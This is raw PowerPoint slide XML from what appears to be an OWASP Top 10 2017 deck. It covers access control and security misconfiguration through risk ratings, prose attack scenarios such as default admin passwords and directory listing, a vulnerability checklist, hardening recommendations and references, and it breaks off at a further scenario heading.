                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1100" b="0" kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitation of access control is a core skill of penetration testers. SAST and DAST tools can detect the absence of access control, but not verify if it is functional. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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n>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access control weaknesses are common due to the lack of automated detection, and lack of effective functional testing by application developers.</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900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Access control detection is not typically amenable to automated static or dynamic testing.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The technical impact is anonymous attackers acting as users or administrators, users using privileged functions, or creating, accessing, updating or deleting every record.</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911491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a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Example Attack Scenarios</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The app server admin console is automatically installed and not removed. Default accounts aren't changed. Attacker discovers the standard admin pages are on your server, logs in with default passwords, and takes over.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: Directory listing is not disabled on your server. An attacker discovers they can simply list directories to find file. The attacker finds and downloads your compiled Java classes, which they decompile and reverse engineer to get your custom code. Attacker then finds a serious access control flaw in your app.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: App server configuration allows stack traces to be returned to users, potentially exposing underlying flaws such as framework versions that are known to be vulnerable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: App server comes with sample apps that are not removed from your production server. These sample apps have known security flaws attackers use to compromise your server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" u="sng">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Scenario #5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: The default configuration or a copied old one activates old vulnerable protocol versions or options that can be misused by an attacker or malware.</a:t>
            </a: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Am I Vulnerable to Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Misconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Is your application missing the proper security hardening across any part of the application stack? Including:</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Are any unnecessary features enabled or installed (e.g. ports, services, pages, accounts, privileges)?</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Are default accounts and their passwords still enabled and unchanged?</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Does your error handling reveal stack traces or other overly informative error messages to users?</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Do you still use ancient configs with updated software? Do you continue to support obsolete backward compatibility?</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Are the security settings in your application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values?</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For web applications, does the server not send security directives to client agents (e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>HSTS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) or are they not set to secure values?</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Is any of your software out of date? (see A9:2017</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="90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rPr>
              <a:t>Using Components with Known Vulnerabilities)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Without a concerted, repeatable application security configuration process, systems are at a higher risk.</a:t>
            </a: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References</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:hlinkClick r:id="rId5"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-8255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6"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Configuration Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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7"/>
              </a:rPr>
              <a:t>OWASP Testing Guide: Testing for Error Codes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>For additional requirements in this area, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ASVS requirements areas for Security Configuration (V11 and V19)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>External</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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9"/>
              </a:rPr>
              <a:t>NIST Guide to General Server Hardening</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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10"/>
              </a:rPr>
              <a:t>CWE Entry 2 on Environmental Security Flaws</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial"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11"/>
              </a:rPr>
              <a:t>CIS Security Configuration Guides/Benchmarks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="900" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>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pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The primary recommendations are to establish all of the following:</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A repeatable hardening process that makes it fast and easy to deploy another environment that is properly locked down. Development, QA, and production environments should all be configured identically (with different credentials used in each environment). This process should be automated to minimize the effort required to setup a new secure environment.</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Remove or do not install any unnecessary features, components, documentation and samples. Remove unused dependencies and frameworks.</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A process to triage and deploy all updates and patches in a timely manner to each deployed environment. This process needs to include all frameworks, dependencies, components, and libraries (see A9:2017 Using Components with Known Vulnerabilities). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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A strong application architecture that provides effective, secure separation between components, with segmentation, containerization, or cloud security groups (ACLs). </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An automated process to verify the effectiveness of the configurations and settings in all environments.</a:t>
            </a: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A6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Security Misconfiguration</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="34" name="Tabelle 33"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3698817458"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exploitability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="1">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Arial"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bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Prevalence </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg2"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg2"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" kern="1200" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="OpenSymbol"/>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1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Technical </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1200" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        </a:rPr>
                        <a:t></a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1200" b="0" baseline="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>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gn="l">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Even anonymous attackers can try to access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, database, frameworks, and custom code. Automated scanners are useful for detecting  misconfigurations, use of default accounts or configurations, unnecessary services, legacy options etc.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000">
                        <a:ln>
                          <a:noFill/>
                        </a:ln>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0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Such flaws frequently give attackers unauthorized access to some system data or functionality. Occasionally, such flaws result in a complete system compromise. The business impact depends on the protection needs of your application and data.</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4197497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Example Attack Scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
